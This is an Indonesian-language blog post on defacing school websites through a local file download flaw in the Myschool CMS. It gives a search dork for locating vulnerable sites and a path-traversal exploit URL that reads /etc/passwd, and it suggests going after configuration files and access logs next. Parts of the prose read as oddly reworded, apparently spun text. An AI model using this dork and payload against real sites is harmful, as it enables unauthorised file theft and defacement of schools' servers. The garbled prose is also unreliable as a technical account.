Home » Unlabelled
» Cara Deface Myschool CMS LFD Vulnerability
Cara Deface Myschool CMS LFD Vulnerability
CMS Myschool adalah sebuah konten manajemen yang dibikin oleh anekaweb pakai php dan mysql, yang ditujukan untuk web – web sekolah. Walaupun tidak semua web sekolah menggunakannya dan tidak semua penggunanya adalah web sekolah. :v Selain memicu cms myschool, banyak cms lain yang telah dibikin oleh anekaweb. Tapi ga mutlak sih, disini kan kita hanya rela bahas lfd terhadap cms myschool. Nah, membuat yang blom tau lfd itu apa kalian sanggup baca artikel Local file download vulnerability.
Sebelum aku memicu write up disini, aku pernah mempublikasikan celah ini di cxsecurity kala aku tetap berada di Error Violence. Tapi apalah error violence, itu hanya aku greet karena team aja.
Dalam kerentanan LFD ini, yang aku contohkan adalah mengambi file /etc/passwd dari server pakai celah Local file download terhadap user. Nah, untuk pemanfaatan lain layaknya melacak konfigurasi access logs dan sebagainya silakan cari sendiri dirnya 😀
Dork: inurl:/img_anekaweb/
Exploit: /webconfig/download.php?file=../../../../../../../../../../etc/passwd
Baca selengkapnya di Myschool CMS LFD Vulnerability.